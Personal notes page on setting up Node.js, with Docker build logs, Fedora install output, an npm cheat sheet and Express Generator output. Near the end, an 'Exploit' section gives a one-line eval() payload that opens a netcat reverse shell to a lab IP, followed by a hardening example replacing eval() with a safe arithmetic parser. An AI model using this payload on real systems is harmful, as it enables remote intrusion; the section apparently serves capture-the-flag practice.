Get Node.js, originally developed by Ryan Dahl, up and running on Windows and Linux.
Node.js on Windows
Download the Node.js installer and run it.
Node.js on Docker
[tuyen@g73jh nodejs]$ docker build -t tuyendq/node-web-app .
Sending build context to Docker daemon 5.632 kB
Step 1/7 : FROM node:10-slim
Trying to pull repository docker.io/library/node ...
sha256:7e32e20848a52d1c77d0ab0e7a38e6c2bc92e2ef88a73bb16b3d64567a33c5e6: Pulling from docker.io/library/node
80369df48736: Already exists
d0a772523932: Pull complete
d1e688f663a2: Pull complete
d5280d845715: Pull complete
4e6f6ecd5080: Pull complete
Digest: sha256:7e32e20848a52d1c77d0ab0e7a38e6c2bc92e2ef88a73bb16b3d64567a33c5e6
Status: Downloaded newer image for docker.io/node:10-slim
 ---> 7a5e19754b85
Step 2/7 : WORKDIR /usr/src/app
 ---> 66adc5dfe7c2
Removing intermediate container e34a089d7b47
Step 3/7 : COPY ./src/package*.json ./
 ---> 0d1aaf848e51
Removing intermediate container 998e2cd4cf4d
Step 4/7 : RUN npm install
 ---> Running in 2ff6df3f7b62
npm notice created a lockfile as package-lock.json. You should commit this file.
npm WARN docker_web_app@1.0.0 No repository field.
npm WARN docker_web_app@1.0.0 No license field.
added 50 packages from 37 contributors and audited 126 packages in 2.859s
found 0 vulnerabilities
 ---> 03055eb76af5
Removing intermediate container 2ff6df3f7b62
Step 5/7 : COPY ./src .
 ---> f25668527ca4
Removing intermediate container 290659e739e9
Step 6/7 : EXPOSE 8080
 ---> Running in e08e7d0dca44
 ---> 2de81d72f5c8
Removing intermediate container e08e7d0dca44
Step 7/7 : CMD node server.js
 ---> Running in 51c6fdf97621
 ---> bf7c833fce48
Removing intermediate container 51c6fdf97621
Successfully built bf7c833fce48
[tuyen@g73jh nodejs]$
[tuyen@g73jh nodejs]$ docker run --name node-web-app -p 49160:8080 -d tuyendq/node-web-app
24c21de620a1a642de3889f20aeb7b267d1bf65264e27e28f9f6eb980bb32370
[tuyen@g73jh nodejs]$
Install Node.js on Fedora Workstation 30
[tuyen@g73jh nodejs]$ sudo dnf install -y nodejs
[sudo] password for tuyen:
Last metadata expiration check: 0:33:40 ago on Wed 20 Nov 2019 08:26:03 PM +07.
Dependencies resolved.
================================================================================================================
 Package             Architecture    Version                        Repository    Size
================================================================================================================
Installing:
 nodejs              x86_64          1:10.16.3-1.fc30               updates       100 k
Installing dependencies:
 http-parser         x86_64          2.9.2-1.fc30                   updates       36 k
 nodejs-libs         x86_64          1:10.16.3-1.fc30               updates       8.9 M
Installing weak dependencies:
 npm                 x86_64          1:6.9.0-1.10.16.3.1.fc30       updates       3.8 M
Transaction Summary
================================================================================================================
Install  4 Packages
Total download size: 13 M
Installed size: 64 M
Downloading Packages:
(1/4): http-parser-2.9.2-1.fc30.x86_64.rpm              16 kB/s |  36 kB     00:02
(2/4): nodejs-10.16.3-1.fc30.x86_64.rpm                 39 kB/s | 100 kB     00:02
(3/4): nodejs-libs-10.16.3-1.fc30.x86_64.rpm           1.6 MB/s | 8.9 MB     00:05
(4/4): npm-6.9.0-1.10.16.3.1.fc30.x86_64.rpm           976 kB/s | 3.8 MB     00:03
----------------------------------------------------------------------------------------------------------------
Total                                                  1.8 MB/s |  13 MB     00:06
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Running scriptlet: npm-1:6.9.0-1.10.16.3.1.fc30.x86_64        1/1
  Preparing        :                                            1/1
  Installing       : http-parser-2.9.2-1.fc30.x86_64            1/4
  Installing       : nodejs-libs-1:10.16.3-1.fc30.x86_64        2/4
  Installing       : npm-1:6.9.0-1.10.16.3.1.fc30.x86_64        3/4
  Installing       : nodejs-1:10.16.3-1.fc30.x86_64             4/4
  Running scriptlet: nodejs-1:10.16.3-1.fc30.x86_64             4/4
  Verifying        : http-parser-2.9.2-1.fc30.x86_64            1/4
  Verifying        : nodejs-1:10.16.3-1.fc30.x86_64             2/4
  Verifying        : nodejs-libs-1:10.16.3-1.fc30.x86_64        3/4
  Verifying        : npm-1:6.9.0-1.10.16.3.1.fc30.x86_64        4/4
Installed:
  nodejs-1:10.16.3-1.fc30.x86_64
  npm-1:6.9.0-1.10.16.3.1.fc30.x86_64
  http-parser-2.9.2-1.fc30.x86_64
  nodejs-libs-1:10.16.3-1.fc30.x86_64
Complete!
[tuyen@g73jh nodejs]$
Check the versions of Node.js and npm
[tuyen@g73jh nodejs]$ node --version
v10.16.3
[tuyen@g73jh nodejs]$ npm --version
6.9.0
[tuyen@g73jh nodejs]$
Node.js on Fedora minimal server 31 - Raspberry Pi 2
[tuyendq@p22 ~]$ sudo dnf install -y nodejs
[sudo] password for tuyendq:
Fedora Modular 31 - armhfp                             1.2 kB/s | 7.2 kB     00:05
Fedora Modular 31 - armhfp - Updates                   821  B/s | 5.7 kB     00:07
Fedora 31 - armhfp - Updates                           2.9 kB/s | 5.8 kB     00:01
Fedora 31 - armhfp                                     8.4 kB/s | 7.3 kB     00:00
Dependencies resolved.
================================================================================================================
 Package             Architecture    Version                        Repository    Size
================================================================================================================
Installing:
 nodejs              armv7hl         1:12.13.0-7.fc31               updates       410 k
Installing dependencies:
 libuv               armv7hl         1:1.33.0-2.fc31                updates       134 k
 nodejs-libs         armv7hl         1:12.13.0-7.fc31               updates       18 M
 npm                 armv7hl         1:6.12.0-1.12.13.0.7.fc31      updates       3.4 M
 http-parser         armv7hl         2.9.2-2.fc31                   fedora        36 k
Installing weak dependencies:
 nodejs-docs         noarch          1:12.13.0-7.fc31               updates       2.4 M
Transaction Summary
================================================================================================================
Install  6 Packages
Total download size: 24 M
Installed size: 112 M
Downloading Packages:
(1/6): libuv-1.33.0-2.fc31.armv7hl.rpm                  36 kB/s | 134 kB     00:03
(2/6): nodejs-12.13.0-7.fc31.armv7hl.rpm                52 kB/s | 410 kB     00:07
(3/6): npm-6.12.0-1.12.13.0.7.fc31.armv7hl.rpm         178 kB/s | 3.4 MB     00:19
(4/6): http-parser-2.9.2-2.fc31.armv7hl.rpm             17 kB/s |  36 kB     00:02
(5/6): nodejs-docs-12.13.0-7.fc31.noarch.rpm            74 kB/s | 2.4 MB     00:33
(6/6): nodejs-libs-12.13.0-7.fc31.armv7hl.rpm          286 kB/s |  18 MB     01:03
----------------------------------------------------------------------------------------------------------------
Total                                                  356 kB/s |  24 MB     01:09
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Running scriptlet: npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl      1/1
  Preparing        :                                            1/1
  Installing       : libuv-1:1.33.0-2.fc31.armv7hl              1/6
  Installing       : nodejs-docs-1:12.13.0-7.fc31.noarch        2/6
  Installing       : nodejs-libs-1:12.13.0-7.fc31.armv7hl       3/6
  Installing       : http-parser-2.9.2-2.fc31.armv7hl           4/6
  Installing       : npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl      5/6
  Installing       : nodejs-1:12.13.0-7.fc31.armv7hl            6/6
  Running scriptlet: nodejs-1:12.13.0-7.fc31.armv7hl            6/6
  Verifying        : libuv-1:1.33.0-2.fc31.armv7hl              1/6
  Verifying        : nodejs-1:12.13.0-7.fc31.armv7hl            2/6
  Verifying        : nodejs-docs-1:12.13.0-7.fc31.noarch        3/6
  Verifying        : nodejs-libs-1:12.13.0-7.fc31.armv7hl       4/6
  Verifying        : npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl      5/6
  Verifying        : http-parser-2.9.2-2.fc31.armv7hl           6/6
Installed:
  nodejs-1:12.13.0-7.fc31.armv7hl
  nodejs-docs-1:12.13.0-7.fc31.noarch
  libuv-1:1.33.0-2.fc31.armv7hl
  nodejs-libs-1:12.13.0-7.fc31.armv7hl
  npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl
  http-parser-2.9.2-2.fc31.armv7hl
Complete!
[tuyendq@p22 ~]$ node --version
v12.13.0
[tuyendq@p22 ~]$ npm --version
6.12.0
[tuyendq@p22 ~]$
Node.js Cheat Sheet
npm help
npm list -g
npm config get prefix
npm help
npm install <package> --global
npm uninstall <package> --global
Express Generator
Install Express Generator
D:\Projects>npm install -g express-generator
D:\nodejs\node_modules\npm\express -> D:\nodejs\node_modules\npm\node_modules\express-generator\bin\express-cli.js
+ express-generator@4.16.1
updated 1 package in 4.831s
F:\Projects>
PS D:\projects\lthwnodejs> npm list -g | grep express-generator
PS D:\projects\lthwnodejs> npm i express-generator -E -g
D:\nodejs\express -> D:\nodejs\node_modules\express-generator\bin\express-cli.js
+ express-generator@4.16.1
added 10 packages from 13 contributors in 50.067s
PS D:\projects\lthwnodejs> npm list -g | grep express-generator
+-- express-generator@4.16.1
PS D:\projects\lthwnodejs> which express
/d/nodejs/express
PS D:\projects\lthwnodejs> express --view=pub mongodbtest
   create : mongodbtest\
   create : mongodbtest\public\
   create : mongodbtest\public\javascripts\
   create : mongodbtest\public\images\
   create : mongodbtest\public\stylesheets\
   create : mongodbtest\public\stylesheets\style.css
   create : mongodbtest\routes\
   create : mongodbtest\routes\index.js
   create : mongodbtest\routes\users.js
   create : mongodbtest\views\
   create : mongodbtest\app.js
   create : mongodbtest\package.json
   create : mongodbtest\bin\
   create : mongodbtest\bin\www
   change directory:
     > cd mongodbtest
   install dependencies:
     > npm install
   run the app:
     > SET DEBUG=mongodbtest:* & npm start
PS D:\projects\lthwnodejs>
Exploit
Exploit eval() to create a reverse shell
require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.146.172 1234 >/tmp/f')
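A payload like the one above only runs when an application hands request data to eval(). The following is an added example, not part of the original notes: it replaces such a sink with a parser that accepts arithmetic only. The `/calc` route, the `safeCalc` name and the 256-character cap are assumptions made for illustration.

```javascript
// Hypothetical vulnerable handler (the sink such payloads need):
//   app.get('/calc', (req, res) => res.send(String(eval(req.query.expr))));
// Hardened replacement: parse arithmetic only, never execute request text.
const TOKEN = /\s*(?:(\d+(?:\.\d+)?)|([-+*/()]))/y; // one number or one operator

function tokenize(src) {
  const tokens = [];
  let pos = 0;
  while (src.slice(pos).trim() !== '') {
    TOKEN.lastIndex = pos;
    const m = TOKEN.exec(src);
    // Identifiers, quotes, dots, etc. never match, so code cannot get through.
    if (!m) throw new SyntaxError(`unexpected input at offset ${pos}`);
    tokens.push(m[1] !== undefined ? Number(m[1]) : m[2]);
    pos = TOKEN.lastIndex;
  }
  return tokens;
}

function safeCalc(src) {
  // 256 is an assumed cap; it also bounds the parser's recursion depth.
  if (typeof src !== 'string' || src.length > 256) throw new RangeError('bad input');
  const t = tokenize(src);
  let i = 0;
  function primary() {
    const tok = t[i++];
    if (typeof tok === 'number') return tok;
    if (tok === '-') return -primary();
    if (tok === '(') {
      const v = expr();
      if (t[i++] !== ')') throw new SyntaxError('expected )');
      return v;
    }
    throw new SyntaxError('expected a number');
  }
  function term() {
    let v = primary();
    while (t[i] === '*' || t[i] === '/') v = t[i++] === '*' ? v * primary() : v / primary();
    return v;
  }
  function expr() {
    let v = term();
    while (t[i] === '+' || t[i] === '-') v = t[i++] === '+' ? v + term() : v - term();
    return v;
  }
  const v = expr();
  if (i !== t.length) throw new SyntaxError('trailing input');
  return v;
}
```

In a handler, catch the thrown error and answer with HTTP 400 instead of echoing the rejected input back.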
Related articles
>>> Deno: A secure runtime for JavaScript and TypeScript
Practice
>>> THM | UltraTech
>>> THM | GLITCH